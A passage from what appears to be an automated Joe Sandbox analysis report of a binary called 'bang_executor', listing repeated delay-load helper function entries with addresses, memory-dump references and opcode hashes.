                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 106517d8d8f883bfcd92d72141416a01d3443c11596be89a8ff8c4432394951a
                                        • Instruction ID: ebd3000854d8a6b212ac9ba241aa9bb1ec09889afb0785556b46a35795fd061b
                                        • Opcode Fuzzy Hash: 106517d8d8f883bfcd92d72141416a01d3443c11596be89a8ff8c4432394951a
                                        • Instruction Fuzzy Hash: B0B012A635C403AD71145148DD06E7F0D5CF6C4B14B30AB7AF408C00C0D4411C414232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005006B5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: e1879ad6907b1ef1e117fdf3ed2e464d102435015a13de3a057ac4d8a50cf00a
                                        • Instruction ID: 8deb5b7e68127e3321f7c78935b883635f0ddc422b2351f12072f90f818b5bcf
                                        • Opcode Fuzzy Hash: e1879ad6907b1ef1e117fdf3ed2e464d102435015a13de3a057ac4d8a50cf00a
                                        • Instruction Fuzzy Hash: 58B0129A35C603AE72545148DC06E7F0D4CF6C4B14B30AA3AF008C11C0D4401C808232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005006A1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: ff3b7013756394590dcd06c24988067731d00296af6aea4a192b08759cab09cf
                                        • Instruction ID: cb51b3ebbe8b963d1b0b4ba3006935a55e327ab85aa54cd5578e7cd35c5ff597
                                        • Opcode Fuzzy Hash: ff3b7013756394590dcd06c24988067731d00296af6aea4a192b08759cab09cf
                                        • Instruction Fuzzy Hash: 54B012A636C503AD71145188DC06E7F0D5CF6C4B14B30AE3BF008C00C0D4401C404232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005006AB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 519871cac7c7d78218273647396807fd3890f804e8925de517f1b59785fbccc9
                                        • Instruction ID: d55086f80a17239163e98cb6e92ff19b313ae600ab119b9730639cac6be1a67a
                                        • Opcode Fuzzy Hash: 519871cac7c7d78218273647396807fd3890f804e8925de517f1b59785fbccc9
                                        • Instruction Fuzzy Hash: 0CB0129A35C543AE71145148DC06E7F0D4CF6C4B14B30E93AF408C11C0D4402C444232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050075F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 73d0effbaafac091014d3a5966c2ab2514bf41eb884d1eb2a68dfd0a8465e7e5
                                        • Instruction ID: 761c8be3bc1dee43b41e8ce72881910b703c0741b5bdabdc3f493abf6ea33d29
                                        • Opcode Fuzzy Hash: 73d0effbaafac091014d3a5966c2ab2514bf41eb884d1eb2a68dfd0a8465e7e5
                                        • Instruction Fuzzy Hash: 4DB012A635C403AD711851489D06E7F0DCCF6C4B14F30A93AF408C00C0D4411C414232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500719 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 45dfc76241e60c398f9a32df71320b60663e98f8ac0127ed813aa1a3eef5872c
                                        • Instruction ID: 2fa02796d079813a5ccd9a80d71a8de9aa5f7fff5e4c860d9c853eb59753a646
                                        • Opcode Fuzzy Hash: 45dfc76241e60c398f9a32df71320b60663e98f8ac0127ed813aa1a3eef5872c
                                        • Instruction Fuzzy Hash: 71B012A635C403AD711451499C06E7F0D4CF6C4B14B30BD3AF008C00C1D4401C405232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050070F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 38a617009ba70223b4629f66405d37ae4ec403103a7e6dd594390d676392ddc6
                                        • Instruction ID: 814d79781caffb353171e7a5421d49f5f41a12013266bf4d12f510030002e648
                                        • Opcode Fuzzy Hash: 38a617009ba70223b4629f66405d37ae4ec403103a7e6dd594390d676392ddc6
                                        • Instruction Fuzzy Hash: 0CB012A635C403AD711451489D06E7F0D4CF6C4B18B30B93AF408C00C0D4411D415232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050072D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: cb3d81c5d648a49146036830db46927a487af8b87429564eef67f60a63a81dd7
                                        • Instruction ID: a486af349355bc881cf698d3c291ed5382e562d1c68527a6a26e67177133c556
                                        • Opcode Fuzzy Hash: cb3d81c5d648a49146036830db46927a487af8b87429564eef67f60a63a81dd7
                                        • Instruction Fuzzy Hash: 97B012A635D503AD725452489C06E7F0D4DF6C4B14F30AA3AF008C00C0D4401C804232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005008C4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005008A7
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: e3db5266d56f8dbf721231cbda6639f2362da2ef1b543ae423375068fca67cd0
                                        • Instruction ID: 89bb33515a9645c4c97e054ebdb43423516a6bd6c3ba1bab307d80ea5995a142
                                        • Opcode Fuzzy Hash: e3db5266d56f8dbf721231cbda6639f2362da2ef1b543ae423375068fca67cd0
                                        • Instruction Fuzzy Hash: 4FB012A335D201AC761861495C4AE7E0E4CFAC4B14B30D93EF00CC11C1D4401CC44132
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005008CE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005008A7
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 1629b38d63d3f191b4b064cd83579b9b8476c112264fdeea6bdcff24b79f2886
                                        • Instruction ID: b6f1987d485df07667a3eda8828f7c4bd5a85c00b65935a984a2379e8b2a3c5a
                                        • Opcode Fuzzy Hash: 1629b38d63d3f191b4b064cd83579b9b8476c112264fdeea6bdcff24b79f2886
                                        • Instruction Fuzzy Hash: DCB012A339D105AC710861495C4AF7E0E4CFAC4B14B30DC3EF00CC11C1D4401C800232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005008F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005008A7
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: a93d658f47d4ffab60e67c760eaffbf12eb19c3bc97d68aab8315613aea2fa46
                                        • Instruction ID: 5dc816e06831ddba8a2762f2dbae17fc1c9322c6cd96c8fc5623b808a62ebb2a
                                        • Opcode Fuzzy Hash: a93d658f47d4ffab60e67c760eaffbf12eb19c3bc97d68aab8315613aea2fa46
                                        • Instruction Fuzzy Hash: 2AB012A336D001AC710861889C0EF7E0E4CFAC4B14B30DE3FF00CC00C1D4401C800132
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005009EA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005009FC
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: bb13796080d9ad98cab9391d11e74cc7662b870765c15b1980588a048c8f70d4
                                        • Instruction ID: 52e94098536b5649564ad5c22b42bdcbbecef4335245f960074203e345347d86
                                        • Opcode Fuzzy Hash: bb13796080d9ad98cab9391d11e74cc7662b870765c15b1980588a048c8f70d4
                                        • Instruction Fuzzy Hash: 37B012D739E402BCB2041148BD0BDBF0E0CFAC0B1CB30DD3AF004C00C298511C410132
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500A19 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005009FC
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 9ba43236c6a3b204d985f659c5cc927c8a6bb237bb06ca1d29750fcee844f038
                                        • Instruction ID: 72ba1365f664dd008500b1b4734c5138c6b78b822fcd387db2abbd699295c638
                                        • Opcode Fuzzy Hash: 9ba43236c6a3b204d985f659c5cc927c8a6bb237bb06ca1d29750fcee844f038
                                        • Instruction Fuzzy Hash: DDB012D239D002ACB1045158BC0BFBF0E4CF2C4B147309D3AF008C10C1D4401C440232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500A05 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005009FC
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: f3dbd4c44a5a060922386830f3adc870d1ceacd9b0319cafb1d5e7a49a70953e
                                        • Instruction ID: 1858bc12240fd79d0480f0559ab766f4ddfad33806f9d7b67618e29e1b21f3fa
                                        • Opcode Fuzzy Hash: f3dbd4c44a5a060922386830f3adc870d1ceacd9b0319cafb1d5e7a49a70953e
                                        • Instruction Fuzzy Hash: ADB012D239D101ACB2145158BC0BEBF0E4CF2C4B147309E3AF008C11C1D4411C880632
                                        Uniqueness

                                        Uniqueness Score: -1.00%

